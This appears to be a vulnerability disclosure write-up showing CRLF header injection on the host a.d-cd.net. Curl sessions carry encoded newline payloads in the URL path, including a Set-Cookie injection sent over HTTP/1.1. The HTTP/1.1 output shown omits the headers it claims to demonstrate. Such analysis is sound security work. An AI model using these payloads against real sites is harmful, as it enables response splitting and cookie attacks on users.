```
ubuntu@rwx:~$ curl -v 'http://a.d-cd.net/'
> GET / HTTP/1.1
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx
< Date: Tue, 28 Jan 2020 19:39:09 GMT
< Content-Type: text/html
< Content-Length: 162
< Connection: keep-alive
< Location: https://a.d-cd.net/
< X-Clacks-Overhead: GNU Terry Pratchett
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
```
I did not know what content the server behind a.d-cd.net was serving, and I did not analyze the server itself. The a.d-cd.net server enforces HSTS, so any plain HTTP request is redirected to HTTPS.
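As a quick sanity check, you can follow the redirect chain and confirm the HSTS header with curl (a minimal sketch; the grep filter is only for readability):

```
# Follow redirects and print the final URL we land on.
curl -s -o /dev/null -L -w '%{url_effective}\n' 'http://a.d-cd.net/'
# Confirm the HSTS policy on the HTTPS endpoint.
curl -sI 'https://a.d-cd.net/' | grep -i 'strict-transport-security'
```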
```
ubuntu@rwx:~$ curl -v https://a.d-cd.net/path?
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55600336c580)
> GET /path? HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 301
< server: nginx
< date: Tue, 28 Jan 2020 19:23:20 GMT
< content-type: text/html
< content-length: 162
< location: https://a.d-cd.net/path
< x-clacks-overhead: GNU Terry Pratchett
< x-content-type-options: nosniff
< strict-transport-security: max-age=31622400
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
* Connection #0 to host a.d-cd.net left intact
```
While scanning the server, I noticed something unusual: regardless of the path, if the URL contains a query string (e.g. ?a=b), the server strips it and issues another redirect. I suspect this is done for caching, but I am not sure.
In short: an HTTP request is redirected to HTTPS, and an HTTPS request whose URL contains a ?... part is redirected to the same URL with that part removed. When the query string is stripped, the path portion comes back URL-decoded in the Location header of the response, which means encoded control characters such as %0a end up as raw bytes in a response header.
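This is easy to check directly. In the sketch below, the encoded path /%61%62%63 is just an arbitrary test value of mine:

```
# Send an encoded path plus a query string and inspect the Location header.
# Per the behaviour described above, the query should be stripped and the
# path URL-decoded, i.e. something like: location: https://a.d-cd.net/abc
curl -s -o /dev/null -D - 'https://a.d-cd.net/%61%62%63?x=1' | grep -i '^location'
```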
```
ubuntu@rwx:~$ curl -v 'https://a.d-cd.net/path%0aheader:%20value%0a?'
> GET /path%0aheader:%20value%0a? HTTP/2
> Host: a.d-cd.net
> User-Agent: curl/7.58.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
* http2 error: Invalid HTTP header field was received: frame type: 1, stream: 1, name: [location], value: [https://a.d-cd.net/path
header: value
]
* HTTP/2 stream 1 was not closed cleanly: PROTOCOL_ERROR (err 1)
* Connection #0 to host a.d-cd.net left intact
curl: (92) HTTP/2 stream 1 was not closed cleanly: PROTOCOL_ERROR (err 1)
```
I expected this to be exploitable for CRLF injection, but HTTP/2 validates header field values at the framing layer, so the attempt is rejected with a protocol error instead of being delivered. I don't know whether this is intended, but the h2 error keeps the malicious headers from ever being interpreted by the browser.
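The failure also shows up in curl's exit status. A minimal check, assuming a curl build with HTTP/2 support:

```
# Force HTTP/2 and inspect the exit code; 92 is CURLE_HTTP2_STREAM,
# i.e. the stream was torn down by a protocol error.
curl --http2 -s -o /dev/null 'https://a.d-cd.net/path%0aheader:%20value%0a?'
echo $?
```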
The screen above shows the same HTTP/2 error occurring in the latest version of Chrome when visiting https://a.d-cd.net/%0aa%0a? (browsers that support HTTP/2 fail in the same way curl does).
These errors work as a mitigation, but they are not sufficient. The browser prefers HTTP/2, but the server still supports HTTP/1.1 and earlier. When a user connects through a proxy that does not support HTTP/2, the browser falls back to HTTP/1.1, and the header injection goes through as plain text.
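For instance, forcing HTTP/1.1 with curl carries the injection through; the Set-Cookie payload below is my own illustrative value, and the tail of the resulting response is shown next:

```
# --http1.1 disables the h2 framing checks, so the decoded %0a bytes land
# in the response as real line breaks (payload is illustrative).
curl -v --http1.1 'https://a.d-cd.net/path%0aSet-Cookie:%20key=value%0a?'
```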
```
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
* Connection #0 to host a.d-cd.net left intact
```
Here curl sent the request with the --http1.1 option, and you can verify that the injected Set-Cookie header is received without any protocol error.
In conclusion, CRLF injection is possible whenever the user's browser or proxy does not support HTTP/2 (ALPN). In that case, arbitrary headers and content can be injected into the response.
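Whether a given client is protected ultimately comes down to ALPN negotiation, which can be checked with openssl s_client (a sketch; the -alpn option requires OpenSSL 1.0.2 or later):

```
# "ALPN protocol: h2" means the connection would use HTTP/2 and the
# injection is blocked; "http/1.1" means it would go through.
openssl s_client -alpn h2,http/1.1 -connect a.d-cd.net:443 < /dev/null 2>/dev/null | grep -i 'alpn'
```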